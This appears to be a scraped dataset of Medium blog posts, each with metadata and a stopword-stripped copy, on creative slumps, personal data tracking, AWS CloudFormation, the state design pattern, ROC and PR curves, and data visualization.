They get back up. They keep climbing higher. 2. Get back to the basics Too often, humans like to make things far more complicated than they need to be. Look no further than your own email inbox to prove my point. But let’s look at another example — lifting weights. Or more specifically, let’s look at my dad lifting weights. He’s just over 60 years old, and I’m proud as all hell that he’s keeping himself in shape. Looking at the guy, you’d see that he definitely has an above-average fitness level for a male his age, however, in his own world, he struggles to reach his goals in the gym. He’s one of those guys that reads tons of fitness magazines and articles online, always learning new tips, tricks, and fads for building muscle. He tries putting those complicated routines and obscure exercises into practice. 
The first week usually goes great — he feels sore and like he’s making progress. Shortly after, results halt and he’s right back in Slumpville. Feeling the frustration of his failures, he gets demotivated and skips workouts. “I’ll get back to it when I’m feeling more inspired next week.” And that’s the root of the problem right there. He tries to make his work too complicated and ends up breaking the cardinal rule of muscle gains — consistency. The same goes for writing and other creative endeavors. When you feel yourself lacking motivation, in a slump, or struggling to produce anything worthwhile, it’s usually a sign that you need to get back to the basics aka creating consistently. Don’t worry about what you write, or how good whatever you’re writing is. You’re not trying to be the next Ernest Hemingway during a slump, you’re just trying to survive through it. Schedule a time to write and just write. Whatever you do, don’t skip a session. Treat it like religion. Get back to the basics and put in the reps. Will it be boring and hard work? Yes, but it’s necessary to remember where you started and keep up with what got you to where you are today. 3. Consume similarly creative content Every time I find myself lacking creativity, it’s almost always because I’ve stopped ingesting similarly creative content. After all, creativity begets creativity. Other pieces of creative art act like food to fuel my own inner creativeness. But it doesn’t work when you consume just any content. For example, binge-watching an anime show on Netflix or playing Hades on the Switch rarely inspires me with new content ideas in the realm of non-fiction writing. Will I sometimes surprise myself and stumble upon an idea I can use? Sure. Does it happen often? No. If I were a screenwriter or video game developer, these might be viable ways to generate creativity, but for me as a writer, they’re traps — ways to distract or unwind more than anything. What I need to do as a writer, and what you need to do as a creator of whatever it is you create, is to consume similar pieces of creative art. I do this by reading non-fiction books, listening to podcasts, answering questions on Quora, and reading other articles on Medium. When you consume other creative pieces of art, it gets your own creative juices flowing, and ideas start erupting out of your mind like a volcano. Write these down. Write them all down. Before long, you’ll have more ideas coming to you than you’ll be able to launch out into the world. This is where you want to be as a creator — infinite backlog land. Above All, Keep Slugging Through At one point during Chris Davis’ record-breaking slump, he considered drastic action. He thought about walking away from baseball and a massive contract worth millions of dollars. To be honest, that probably would’ve been the easy way out. Easy to give up that much cash? Ok, maybe not, but for a guy who, at one time, was the best in the world, quitting the game would’ve been a surefire way to end the tormenting boos of once-adoring fans and repeatedly striking out at the plate. But as English theologian, Thomas Fuller, once said (though more recently popularized in “The Dark Knight” Batman movie): “It’s always darkest before the dawn.” And though a creative slump can sometimes feel like a lifetime of struggle and misery, it’s during those dark, monotonous times that you find out what kind of person you really are. Don’t give up. Keep slugging through.
https://medium.com/better-advice/how-to-keep-being-creative-when-life-feels-dull-and-meaningless-e37cfb4d1315
['Jason Gutierrez']
2020-12-16 06:01:23.878000+00:00
['Inspiration', 'Creativity', 'Motivation', 'Create', 'Self Improvement']
Title Keep Creative Life Feels Dull MeaninglessContent Baltimore Orioles first baseman Chris Davis one Major League Baseball’s mostfeared juggernaut batter’s box 2013 2015 led major home run held batting average 286 262 respectively end 2018 extending 2019 season Davis led league another statistic one far le dominant number time blasted baseball park — atbats row without single hit Yep starting September 14 2018 ending April 13 2019 Davis went 0 54 marking historically abysmal stretch career setting worst hitting streak record MLB history day slump finally ended Davis rejoiced finishing 3 5 two double four RBIs raising batting average 000 whopping 079 Still abysmal rise Slumps Kind Humbling 210 day Davis went hitless doubt felt humbled almost human rest u Switching gear baseball creativity “slumps” something run human they’re certainly hurdle I’ve struggled long I’ve writer stretch day even week life feel uninspiring it’s damn near impossible type anything worthwhile onto computer screen subsequent slump fall can’t help wonder many hint life need send finally hang cape I’m repeatedly plagued thought “Maybe sign quit” Yet every time persevere break slump usually piece writing surprise surpasses wildest expectation begs couple question — continue stay creative life feel boring monotonous keep moving forward battling massive slump 1 Remind it’s challenge face respond hold true everything happens life Sometimes it’s creative slump time misspelling word grade school spelling bee reading rejection letter dream college broken significant suffering death loved one Challenges come go far devastating others time face one remind though challenge different others it’s still another obstacle path doesn’t matter — can’t change control always control respond Don’t give Keep pushing Life repeatedly test want try knock strong persevere get back keep climbing higher 2 Get back basic often human like make thing far complicated need Look email inbox prove point let’s look another example — lifting weight specifically let’s look dad lifting weight He’s 60 year old I’m proud hell he’s keeping shape Looking guy you’d see definitely aboveaverage fitness level male age however world struggle reach goal gym He’s one guy read ton fitness magazine article online always learning new tip trick fad building muscle try putting complicated routine obscure exercise practice first week usually go great — feel sore like he’s making progress Shortly result halt he’s right back Slumpville Feeling frustration failure get demotivated skip workout “I’ll get back I’m feeling inspired next week” that’s root problem right try make work complicated end breaking cardinal rule muscle gain — consistency go writing creative endeavor feel lacking motivation slump struggling produce anything worthwhile it’s usually sign need get back basic aka creating consistently Don’t worry write good whatever you’re writing You’re trying next Ernest Hemingway slump you’re trying survive Schedule time write write Whatever don’t skip session Treat like religion Get back basic put rep boring hard work Yes it’s necessary remember started keep got today 3 Consume similarly creative content Every time find lacking creativity it’s almost always I’ve stopped ingesting similarly creative content creativity begets creativity piece creative art act like food fuel inner creativeness doesn’t work consume content example bingewatching anime show Netflix playing Hades Switch rarely inspires new content idea realm nonfiction writing sometimes surprise stumble upon 
idea use Sure happen often screenwriter video game developer might viable way generate creativity writer they’re trap — way distract unwind anything need writer need creator whatever create consume similar piece creative art reading nonfiction book listening podcasts answering question Quora reading article Medium consume creative piece art get creative juice flowing idea start erupting mind like volcano Write Write long you’ll idea coming you’ll able launch world want creator — infinite backlog land Keep Slugging one point Chris Davis’ recordbreaking slump considered drastic action thought walking away baseball massive contract worth million dollar honest probably would’ve easy way Easy give much cash Ok maybe guy one time best world quitting game would’ve surefire way end tormenting boo onceadoring fan repeatedly striking plate English theologian Thomas Fuller said though recently popularized “The Dark Knight” Batman movie “It’s always darkest dawn” though creative slump sometimes feel like lifetime struggle misery it’s dark monotonous time find kind person really Don’t give Keep slugging throughTags Inspiration Creativity Motivation Create Self Improvement
3,825
How to collect data from your life?
How to collect data from your life? A beginner’s guide to personal data Photo by Luke Chesser on Unsplash 1. Decide what’s important to you in your life Before you start collecting data from your life, you should decide why you want to do it. Do you want to be more productive? Healthier? Happier? Pick one or a couple of areas in your life that you want to improve. But be careful about picking too many fields to track. You should only collect the data that you can process. The key is going slow and steady, not moving fast and giving up early. What gets measured gets improved. — Peter Drucker After you decide why you want to collect data and choose some areas to focus on, it is time to identify the data fields to collect. Let’s say you want to focus on health; some data fields to collect could be: Exercised (true/false), Steps, Calorie intake (kcal), Sleep time (hours), Weight (kg). Or maybe you want to track how productive you are during the week, month, or year. In that situation, the fields to track could be: Focused time (minutes), Checked to-do list items (integer), Your own productivity score for the day (out of 10), Main mission (true/false) → every morning I ask myself, “If I could only do one thing today, what should I do?” That’s my main mission for that day. You can do this weekly or monthly, but I found that daily missions work best. These are just basic examples; you can collect data from every part of your life if you think it adds some kind of value to your life. Some people track phone screen time, their moods by the weather, their commutes, or (you probably know how popular this is) their Spotify history. You can see other types of tracking ideas in this great post. Since 2013, I have been counting how many times I sneeze in a year. It started as a misunderstanding: I was supposed to count my blessings in life, but I didn’t know the phrase had another meaning. It started like that, and now it is my icebreaker story. You can see the silly graph below. 2. Collect data regularly We are only at the stage of collecting the data from our lives. What we are going to do with the collected data is a subject for another post. However, before doing anything with it, we have to make sure it is collected properly and regularly. Consistency is very important here. If you only log data when you are feeling dull, or only when you are super productive, the results will not give a clear picture of your life. Every day it gets easier but you gotta do it every day. That’s the hard part. But it does get easier. — Jogging Baboon, Bojack Horseman Try to make a habit of manual data entry. Maybe you can include this in your morning or night routine. Make a cup of a hot beverage and dedicate just 5 minutes a day. Create a recurring task in your to-do list app. Use the “Don’t Break the Chain” method. If daily logging is too frequent for you, try weekly. Do whatever works for you to do it regularly; trust me, you are going to thank yourself. Photo by Andrew Neel on Unsplash Until this point, we have mostly talked about manual data logging, but you should also try to be as regular as possible with automatic data collection. You may wonder how automatic data collection can be irregular; the answer is: because of you. For example, let’s say you are tracking your sleep. You have to make sure that your smartwatch or phone has enough battery to stay on until morning.
Or you might be tracking the places you have been over the year; are you sure that you allowed Google Maps to track your location the whole time? It is little things like that you should keep an eye on. But no matter how hard you try, sometimes life gets in the way, more important stuff comes up, and you lose the streak. Don’t feel discouraged; we are only human. Just try to fill the gaps as accurately as possible and continue to do what you do. This is a marathon, not a sprint. 3. Tools and systems For all the things I listed above, you could use just a pen and paper, but it is almost 2021 and there are much better ways to do it. There are two main categories here. I call them trackers and databases. Trackers are self-explanatory: tools that track data from your life, both automatically and manually. Databases are where all of our data sits before we process it. We shape our tools and, thereafter, our tools shape us. — John Culkin Notion Notion is my ultimate database hub, and not just for the data I collect but for every aspect of my life. How I use Notion as a second brain is a subject for another post, but let me show you my setup for next year’s happiness and productivity tracker. I also use this as a kind of diary. Author’s daily template So what do we have here? This is basically a template to measure how happy and how productive I felt that day. I like to use the other fields to create reports at the end of the year, such as productivity by day of the week or happiness on exercised days (a small example of building this kind of report from an exported log appears below). I also give each day a title, as if it were an episode of Friends, such as The One with the Evil Orthodontist or The One With Phoebe’s Birthday Dinner. It is a dorky thing that I do to remember days in a fun way. This might seem like a long list to keep track of every day, but it wasn’t always like this. I started tracking my mood and general wellbeing in 2016, and this document has been evolving every year since then. I would like to add some external data, like health, weather, to-do list items, or financial information, but that is not possible at the moment with Notion. If you want to use external information, you can use Google Sheets as a database. Google Sheets does almost everything that Notion does, but unfortunately it doesn’t look as good as Notion. Smart watches/bands I believe that smartwatches and smart bands are a bit of a luxury. At the moment you can live just as well without them; unlike a smartphone, they are not essential items for most people. But if you have one, it can help a lot with tracking your life. Photo by Angus Gray on Unsplash Tracking Sleep This is my favorite thing about wearable technology: a device working for you while you are sleeping. I don’t know much about how it does that, but it is great. You can check your sleep score, the average time you fall asleep, or how many times you wake up in a given night. I believe that you can use these pieces of information to make adjustments that will improve your life immensely. Tracking Steps & Location This is a no-brainer; it is the first objective of a smartwatch. Easy data logging I think removing the friction between thinking and doing is where smartwatches shine. Let’s say you are tracking the water you drink. Pulling your phone out of your pocket and logging the entry after every glass might be a struggle, but a single tap on a screen at your wrist is almost nothing. If you are tracking a field that requires multiple manual data entries in a day, using a smartwatch can help you substantially.
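Picking up the reporting idea from the Notion section above: once a year’s log is exported as a CSV (from Notion or Google Sheets), a few lines of pandas can produce those end-of-year reports. This is a hypothetical sketch, not code from the original article, and the column names ("date", "productivity", "exercised", "happiness") are illustrative placeholders.

```python
# Hypothetical sketch: turning an exported daily log (CSV) into the kind of
# end-of-year report described above. Column names are illustrative,
# not taken from the original article's template.
import pandas as pd

log = pd.read_csv("daily_log.csv", parse_dates=["date"])

# Average productivity score by day of the week
by_weekday = log.groupby(log["date"].dt.day_name())["productivity"].mean()
print(by_weekday.sort_values(ascending=False))

# Average happiness on exercised vs. non-exercised days
print(log.groupby("exercised")["happiness"].mean())
```

The same grouping idea works for any field in the template, for example averaging sleep time by month.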
Apple Health App The Health app that comes on iPhones by default is a tremendous database and tracker. I haven’t been in the Android ecosystem since 2014, but I think Google Fit does the same thing on Android devices. The Health app can give you graphs and insights based on what you have already provided. It can hold lots of data for years without getting any slower, which I think is amazing. You can export all of your information if you would like to transfer it to another app. It is very easy to use; just allow the app to do the work. Photo by Arek Adeoye on Unsplash Rapid fire app suggestions
https://medium.com/datadriveninvestor/collect-data-f55780ca8d49
['Emrecan Arık']
2020-12-26 08:51:01.285000+00:00
['Health', 'Productivity', 'Growth Mindset', 'Personal Development', 'Data']
Title collect data lifeContent collect data life beginner’s guide personal data Photo Luke Chesser Unsplash 1 Decide what’s important life start collecting data life decide want want productive Healthier Happier Pick one couple area life want improve careful picking many field track collect data process key going steady slow moving fast giving early get measured get improved — Peter Drucker decide want collect data choose area focus time identify data field collect Let’s say want focus health data field collect like Exercised truefalse Steps Calorie intake kcal Sleep time hour Weight kg maybe want track productive week month year situation area focus listed Focused time minute Checked todo list item integer productivity score day 10 Main mission truefalse → Every morning ask “If could one thing today do” That’s main mission day weekly monthly found daily mission work best basic example collect data every part life think adding kind value life people track phone screen time mood weather commute probably know popular Spotify history see type tracking idea great post Since 2013 collecting many time sneezed year started misunderstanding supposed count blessing life didn’t know another meaning started like icebreaker story see silly graph 2 Collect data regularly stage collecting data life matter going data collected another subject another post However anything make sure collected properly regularly Consistency important log data feeling dull super productive result give clear vision life Every day get easier gotta every day That’s hard part get easier — Jogging Baboon Bojack Horseman Try make habit manual data entry Maybe include morningnight routine Take cup hot beverage dedicate 5 minute day Create recurring task todo list app Use “Don’t Break Chain” method daily logging frequent maybe try weekly whatever work regularly trust going thank Photo Andrew Neel Unsplash point mostly talked manual data logging also try regular possible automatic data collection may think automatic data entry irregular answer example let’s say tracking sleep make sure smartwatch phone battery enough stay morning might tracking place year sure allowed Google Maps track location time little thing like keep eye matter hard try sometimes life get way important stuff come lose streak Don’t feel discouraged human try fill gap accurately possible continue marathon sprint 3 Tools system thing listed use pen paper almost 2021 much better way two main category call tracker database Trackers selfexplanatory tool track data life automatically manually Databases data sits process shape tool thereafter tool shape u — John Culkin Notion Notion ultimate database hub data collect every aspect life use Notion second brain subject another post let show setup next year’s happiness productivity tracker also use kind diary Author’s daily template basically template measure happy productive felt day like use field create report end year Reports like productivity day week happiness exercised day also give day title like episode Friends One Evil Orthodontist One Phoebe’s Birthday Dinner dorky thing remember day fun way might seem like long list keep track every day wasn’t always like started tracking mood general wellbeing 2016 document evolving every year since would like add external data like health weather todo list item financial information possible moment Notion want use external information use Google Sheets database Google Sheets almost everything Notion unfortunately doesn’t look good Notion Smart watchesbands believe 
smartwatches smart band bit luxury item moment live well without essential item people unlike smartphone one help lot track life Photo Angus Gray Unsplash Tracking Sleep favorite thing wearable technology device working sleeping don’t lot information great check sleep score average time fall asleep many time wake given night believe use piece information make adjustment improve life immensely Tracking Steps Location nobrainer first objective smartwatch Easy data logging think removing friction thinking smartwatches shine Let’s say tracking water drink Pulling phone pocket logging every glass might struggle single tap screen wrist almost nothing tracking field requires multiple manual data entry day using smartwatch help substantially Apple Health App Health App come iPhones default tremendous database tracker haven’t Android ecosystem since 2014 think Google Fit thing Android device Health App give graph insight based provided already hold lot data year without getting slower think amazing export information would like transfer another app easy use allow app work Photo Arek Adeoye Unsplash Rapid fire app suggestionsTags Health Productivity Growth Mindset Personal Development Data
3,826
Sleep Sweet Little One
Sign up for American Haiku Steamship To Writing History By American Haiku Writing takes practice. American Haiku is a great way to put your words from your fingers to your piece of paper. Don't quit, you can do it. Take a look
https://medium.com/american-haiku/sleep-sweet-little-baby-23a5e5389357
['Toni Tails']
2020-09-27 11:39:26.309000+00:00
['Humor', 'Mental Health', 'Creativity', 'Poetry', 'Art']
Title Sleep Sweet Little OneContent Sign American Haiku Steamship Writing History American Haiku Writing take practice American Haiku great way put word finger piece paper Dont quit Take lookTags Humor Mental Health Creativity Poetry Art
3,827
4 Great But Underrated AWS Services
1. CloudFormation CloudFormation is a service that enables us to describe infrastructure as code. Infrastructure as code is a well-known practice to set out and manage IT infrastructure through the configuration files. With CloudFormation, we can define all required components and dependencies between them. There are a few benefits to having everything in configuration files. First, it makes it possible to speed up the processes, as the task stays only within the code. No navigation between different services and connecting them through the user interface. Second, it adds more reliability and reduces human errors. The code can be reviewed by other engineers, and in case of mistake, the changes can be reverted quickly. For example, the following piece of code creates a new S3 bucket under your account: As you can see, only seven lines of code can create a new S3 bucket with a default setup at any moment. No need to do the job manually through the AWS console. CloudFormation supports two formats: JSON and YAML. Besides that, CloudFormation offers features such as nested stacks, exporting values, or passing parameters between stacks. Indeed, it is a very powerful service to maintain the whole company's infrastructure. CloudFormation is a free service and you need to pay only for provisioned components.
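The snippet the passage refers to (the "seven lines of code") is not reproduced in this text, so here is a minimal sketch of what such a template might look like, wrapped in a boto3 call that deploys it as a stack. This is an assumption-based illustration, not the author’s original snippet; the stack name and bucket name are placeholders (S3 bucket names must be globally unique).

```python
# Hedged sketch (not the article's original snippet): a minimal CloudFormation
# template defining a single S3 bucket, deployed as a stack with boto3.
import boto3

TEMPLATE = """
AWSTemplateFormatVersion: "2010-09-09"
Resources:
  ExampleBucket:
    Type: AWS::S3::Bucket
    Properties:
      BucketName: my-example-bucket-placeholder
"""

cfn = boto3.client("cloudformation")
cfn.create_stack(StackName="example-s3-stack", TemplateBody=TEMPLATE)
```

The same template could just as well live in a .yaml file and be deployed with the AWS CLI’s CloudFormation commands; either way, the bucket definition itself stays those few declarative lines.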
https://medium.com/better-programming/4-great-but-underrated-aws-services-3284ffcb6073
['Dmytro Khmelenko']
2020-10-29 16:35:07.012000+00:00
['AWS', 'Programming', 'Software Development', 'Cloud Computing', 'Cloud']
Title 4 Great Underrated AWS ServicesContent 1 CloudFormation CloudFormation service enables u describe infrastructure code Infrastructure code wellknown practice set manage infrastructure configuration file CloudFormation define required component dependency benefit everything configuration file First make possible speed process task stay within code navigation different service connecting user interface Second add reliability reduces human error code reviewed engineer case mistake change reverted quickly example following piece code creates new S3 bucket account see seven line code create new S3 bucket default setup moment need job manually AWS console CloudFormation support two format JSON YAML Besides CloudFormation offer feature nested stack exporting value passing parameter stack Indeed powerful service maintain whole company infrastructure CloudFormation free service need pay provisioned componentsTags AWS Programming Software Development Cloud Computing Cloud
3,828
Stop Using If-Else Statements
APPLIED DESIGN PATTERNS: STATE Stop Using If-Else Statements Write clean, maintainable code without if-else. You’ve watched countless tutorials using If-Else statements. You’ve probably also read programming books promoting the use of If-Else as the de facto branching technique. It’s perhaps even your default mode to use If-Else. But, let’s put an end to that right now, by replacing If-Else with the state objects. Note that you’d use this approach if you’re writing a class with methods that need its implementations to be changed depending on the current state. You’d apply another approach if you’re not dealing with an object’s changing state. Even if you’ve heard about the state pattern, you might wonder how it is implemented in production-ready code. For anyone who’s still in the dark, here’s a very brief introduction. You’ll increase complexity with any new conditional requirement implemented using If-Else. Applying the state pattern, you simply alter an objects behavior using specialized state objects instead of If-Else statements. Gone are the days with code looking like this below. Warning: PTSD trigger — also, hope you caught the logical error in here (other than the whole thing being a mess) You’ve certainly written more complicated branching before. I have for sure some years ago. The branching logic above isn’t even very complex — but try adding new conditions and you’ll see the thing explode. Also, if you think creating new classes instead of simply using branching statements sounds annoying, wait till you see it in action. It’s concise and elegant. Even better, it’ll make your codebase more SOLID, except for the “D” part tho. “Okay, I’m convinced If-Else is evil, now show me how to avoid messy branching code” We’ll be looking at how I replace If-Else branching in production-ready code. It’s a made-up example, but the approach is the same I’ve used in codebases for large clients. Let’s create a very simple Booking class, that has a few states. It’ll also have two public methods: Accept() and Cancel() . I’ve drawn a diagram to the best of my abilities that displays the different states a booking may be in. Refactoring branching logic out of our code is a three step process: Create an abstract base state class Implement each state as a separate class inheriting from base state Let the Booking ` class have a private or internal method that takes the state base class as a parameter Demo time First, we need a base state class that all states will inherit from. Notice how this base class also has the two methods, Accept and Cancel — although here they are marked as internal. Additionally, the base state has a “special” EnterState(Booking booking) method. This is called whenever a new state is assigned to the booking object. Secondly, we’re making separate classes for each state we want to represent. Notice how each class represents a state as described in the beautiful diagram above. Also, the CancelledState won’t allow our booking to transition to a new state. This class is very similar in spirit to the Null Object Pattern. Finally, the booking class itself. See how the booking class is simply delegating the implementation of Accept and Cancel to its state object? Doing this allows us to remove much of the conditional logic, and lets each state only focus on what’s important to itself — the current state also has the opportunity to transition the booking to a new state. How to deal with new conditional features? 
If the new feature would normally have been implemented using some conditional checking, you can now just create a new state class. It’s as simple as that. You’ll no longer have to deal with unwieldy if-else statements. How do I persist the state object in a database? You don’t. The state object is not important when saving an object to e.g. an SQL or NoSQL database. Only knowing the object’s state and how it should be mapped to a column is important. You can map a state to a friendly type name, an enum or an integer. Whatever you’re comfortable with, as long as you have some way of converting the saved value back into a state object. But you’re still using IFs? Yes — they’re essential. Especially when used as guard clauses. It’s the If-Else combination that is a root cause for maintainability headaches. It’s a lot of additional classes! Indeed. As I’ve mentioned in another article, complexity does not originate from the number of classes you have, but from the responsibilities those classes take. Having many, specialized classes will make your codebase more readable, maintainable, and simply overall more enjoyable to work with.
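The C# gists that originally accompanied this article (the base state, the concrete states, and the Booking class) are not reproduced in this text. The sketch below is a rough Python rendering of the same idea, under the assumption that a booking starts in a "new" state and can move to "accepted" or "cancelled"; the class and method names mirror the prose above (Booking, Accept, Cancel, CancelledState), but the details are illustrative rather than the author’s exact implementation.

```python
# Illustrative Python sketch of the state pattern described above; not the
# author's original C# implementation. Each state decides how accept/cancel
# behave and which state the booking transitions to next.

class BookingState:
    """Base state: concrete states override accept/cancel as needed."""
    def enter_state(self, booking):  # called whenever a booking enters this state
        pass
    def accept(self, booking):
        pass
    def cancel(self, booking):
        pass

class NewState(BookingState):
    def accept(self, booking):
        booking.transition_to(AcceptedState())
    def cancel(self, booking):
        booking.transition_to(CancelledState())

class AcceptedState(BookingState):
    def cancel(self, booking):
        booking.transition_to(CancelledState())

class CancelledState(BookingState):
    """Terminal state: ignores further accept/cancel calls (null-object style)."""
    pass

class Booking:
    def __init__(self):
        self._state = NewState()
        self._state.enter_state(self)

    def transition_to(self, state):
        self._state = state
        state.enter_state(self)

    # The public API simply delegates to the current state object; no if-else chains.
    def accept(self):
        self._state.accept(self)

    def cancel(self):
        self._state.cancel(self)
```

Adding a new conditional feature then means adding a new state class (for example, a hypothetical RefundedState) rather than another if-else branch, which is exactly the point the article makes.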
https://medium.com/swlh/stop-using-if-else-statements-f4d2323e6e4
['Nicklas Millard']
2020-12-15 17:42:16.136000+00:00
['Technology', 'Software Engineering', 'Csharp', 'Programming', 'Software Development']
Title Stop Using IfElse StatementsContent APPLIED DESIGN PATTERNS STATE Stop Using IfElse Statements Write clean maintainable code without ifelse You’ve watched countless tutorial using IfElse statement You’ve probably also read programming book promoting use IfElse de facto branching technique It’s perhaps even default mode use IfElse let’s put end right replacing IfElse state object Note you’d use approach you’re writing class method need implementation changed depending current state You’d apply another approach you’re dealing object’s changing state Even you’ve heard state pattern might wonder implemented productionready code anyone who’s still dark here’s brief introduction You’ll increase complexity new conditional requirement implemented using IfElse Applying state pattern simply alter object behavior using specialized state object instead IfElse statement Gone day code looking like Warning PTSD trigger — also hope caught logical error whole thing mess You’ve certainly written complicated branching sure year ago branching logic isn’t even complex — try adding new condition you’ll see thing explode Also think creating new class instead simply using branching statement sound annoying wait till see action It’s concise elegant Even better it’ll make codebase SOLID except “D” part tho “Okay I’m convinced IfElse evil show avoid messy branching code” We’ll looking replace IfElse branching productionready code It’s madeup example approach I’ve used codebases large client Let’s create simple Booking class state It’ll also two public method Accept Cancel I’ve drawn diagram best ability display different state booking may Refactoring branching logic code three step process Create abstract base state class Implement state separate class inheriting base state Let Booking class private internal method take state base class parameter Demo time First need base state class state inherit Notice base class also two method Accept Cancel — although marked internal Additionally base state “special” EnterStateBooking booking method called whenever new state assigned booking object Secondly we’re making separate class state want represent Notice class represents state described beautiful diagram Also CancelledState won’t allow booking transition new state class similar spirit Null Object Pattern Finally booking class See booking class simply delegating implementation Accept Cancel state object allows u remove much conditional logic let state focus what’s important — current state also opportunity transition booking new state deal new conditional feature new feature would normally implemented using conditional checking create new state class It’s simple You’ll longer deal unwieldy ifelse statement persist state object database don’t state object important saving object eg SQL NoSQL database knowing object’s state mapped column important map state friendly type name enum integer Whatever you’re comfortable long way converting saved value back state object you’re still using IFs Yes — they’re essential Especially used guard clause It’s IfElse combination root cause maintainability headache It’s lot additional class Indeed I’ve mentioned another article complexity originate number class responsibility class take many specialized class make codebase readable maintainable simply overall enjoyable work withTags Technology Software Engineering Csharp Programming Software Development
3,829
An In-Depth Introduction and Comparison of ROC and PR Curves
An In-Depth Introduction and Comparison of ROC and PR Curves In a binary classification model, the model usually does not output 0 or 1 directly as the predicted class. Instead, it outputs a probability for each class, for example by applying softmax over the class scores. This lets us choose a threshold ourselves: when the probability exceeds the threshold we predict the positive class, and otherwise the negative class. ROC curves and PR curves help us analyze this kind of probabilistic forecast. The ROC curve puts FPR on the x-axis and TPR on the y-axis; each point corresponds to the FPR and TPR obtained at a different threshold, and plotting them all traces out the curve. I recommend referring to the confusion matrix introduced in my other article; here is how FPR and TPR are calculated. FPR can be written as 1 - specificity, where specificity measures how well the model correctly identifies negative samples (specificity = TN / (TN + FP), so FPR = FP / (FP + TN)). The higher the specificity, and thus the lower the FPR, the better the model is at correctly identifying negative samples. TPR is also called sensitivity, and it is the familiar recall (TPR = TP / (TP + FN)): it measures how well the model correctly identifies positive samples, so the higher the TPR, the better the model performs on positives. When using normalized units, the area under the curve (often referred to as simply the AUC) is equal to the probability that a classifier will rank a randomly chosen positive instance higher than a randomly chosen negative one (assuming ‘positive’ ranks higher than ‘negative’) — from wikipedia
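As a quick, hedged illustration (not code reproduced from the article): scikit-learn can compute the FPR/TPR pairs behind an ROC curve and the precision/recall pairs behind a PR curve directly from predicted probabilities. The labels and scores below are made-up toy values.

```python
# Illustrative example (not from the original article): computing ROC and PR
# curve points with scikit-learn from a binary classifier's predicted probabilities.
import numpy as np
from sklearn.metrics import roc_curve, precision_recall_curve, auc

y_true = np.array([0, 0, 1, 1, 0, 1, 1, 0])                       # ground-truth labels
y_score = np.array([0.1, 0.4, 0.35, 0.8, 0.2, 0.9, 0.65, 0.55])   # predicted P(positive)

# ROC: FPR on the x-axis, TPR on the y-axis, one point per threshold
fpr, tpr, roc_thresholds = roc_curve(y_true, y_score)
print("ROC AUC:", auc(fpr, tpr))

# PR: recall on the x-axis, precision on the y-axis
# (average_precision_score is the more common single-number PR summary)
precision, recall, pr_thresholds = precision_recall_curve(y_true, y_score)
print("PR AUC:", auc(recall, precision))
```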
https://medium.com/nlp-tsupei/roc-pr-%E6%9B%B2%E7%B7%9A-f3faa2231b8c
['Chen Tsu Pei']
2020-01-02 07:20:09.214000+00:00
['Evaluation', 'AI', 'Python', 'Classification', 'Machine Learning']
Title 深入介紹及比較ROC曲線及PR曲線Content 深入介紹及比較ROC曲線及PR曲線 在一個二分類模型中,我們的模型通常不會直接輸出01直接預測出分類,而是對每個分類輸出一個機率,例如加上softmax對各分類輸出機率,這樣讓我們能夠自己設定一個門檻threshold來決定機率大於多少時我們判定為正樣本,反之為負樣本。而 ROC Curves 和 PR Curves 可以幫助我們分析這樣的 probablistic forcast ROC 曲線以 FPR 為 X 軸,TPR為 軸,每一個點代表設定不同的門檻值所得到的不同的 FPR 及 TPR ,最後繪製成一條曲線。建議可以參考我另一篇文章所介紹的混淆矩陣,以下會再介紹如何計算出 FPR 及 TPR FPR表示成 1特異度 而特異度specificity意指正確判斷出負樣本,故特異度越高、FPR越低,模型越能夠正確判斷負樣本、表現越好 TPR又稱為敏感度Sensitivity,它也是我們熟知的召回率Recall,也就是正確判斷出正樣本,故TPR越高則模型越能夠正確判斷正樣本、表現越好 using normalized unit area curve often referred simply AUC equal probability classifier rank randomly chosen positive instance higher randomly chosen negative one assuming ‘positive’ rank higher ‘negative’ — wikipediaTags Evaluation AI Python Classification Machine Learning
3,830
Knowledge is More Than a Point of Data.
Every month, with clockwork-like precision, a brown paper package arrives in the mail. The unwrapping is revealing. For almost 50 years, National Geographic has been enriching my imagination. The connectedness to ourselves, to our planet and cosmos is like a lattice of human context. It’s also an important source for our visual and aesthetic literacy. I see our graphically visual world as distinctly human, whereas raw data points have no human essence. There should be no mistaking data for knowledge. Big Data and data visualization are important topics. But it’s troubling when their stories are reduced to little more than ill-defined link bait. Accepting that there’s also no unified theory or singular definition for either data or its visualization is important too. We can discern between structured (bits of ledger) and unstructured data (streams of social chatter), but data itself is simply the fodder of columns and rows. It’s the slices of pie that fill a chart. Spreadsheets and pie charts are meaningless artifacts. It’s the art of asking questions that brings them to life. Transforming crumbs of data into information, in turn, gets us to the possibility of knowing. Without structure, data doesn’t become knowledge. It’s like looking into a murky swamp and trying to understand the dividing properties of an amoeba. Try viewing it in a petri dish instead. Appreciating that when there’s no structure, there’s no meaning is what attracted me to Manuel Lima’s book Visual Complexity. It’s influenced my appreciation of visual literacy. It was also cool seeing Mentionmapp on page 153. With a historical context and a framework of techniques and best practices, Visual Complexity also helped me discover other visualization leaders (who we’ll write about in future posts). Lima’s depiction of the visualized network as “the syntax of a new language” made an impression. Knowing that sight is the translational interface between a visual object and a textual relationship was my… “ahhh, that’s it” moment. When data intersects with visual science, there needs to be an aesthetic anchoring for knowledge to surface. There has to be an art to the science. Lima shares this Matt Woolman quote: “functional visualizations are more than statistical analyses and computation algorithms. They must make sense to the users and require a visual language systems that uses colour, shape, line, hierarchy, and composition to communicate clearly and appropriately, much like the alphabetic and character based languages used worldwide between humans.” From his TED2015 talk, Lima says, “we can see this shift from trees into networks in many domains of knowledge. This metaphor of the network, is really already adopting various shapes and forms, and it’s almost becoming a growing visual taxonomy.” Watch Manuel Lima: A visual history of human knowledge Using data to reveal a world of stories is an art. I’m appreciative of how Lima communicates the aesthetic value of visualization. Turning the complex and the chaotic into meaningful social, political, economic, and human insights is essential. We can’t get so lost in the science of data that we forget the importance of allowing our eyes, and ourselves, to both revel in it and discover knowledge in the art of data. Conceptual artist Katie Lewis devises elaborate methods of recording data about herself, be it sensations felt by various body parts or other aspects of life’s minutiae, plotted over time using little more than pins, thread, and pencil-marked dates. 
The artworks themselves are abstracted from their actual purpose, and only the organic forms representing the accumulation of data over time are left. She describes her process as being extremely rigid, involving the creation of strict rules on how data is collected, documented, and eventually transformed into these pseudo-scientific installations. From the pen of John (cofounder) Please visit Mentionmapp today!
https://medium.com/mentionmapp/knowledge-is-more-than-a-point-of-data-dc31f94a1a4
['Mentionmapp Analytics']
2016-10-30 21:57:16.840000+00:00
['Manuel Lima', 'Data Science', 'Data Visualization', 'Big Data', 'Design']
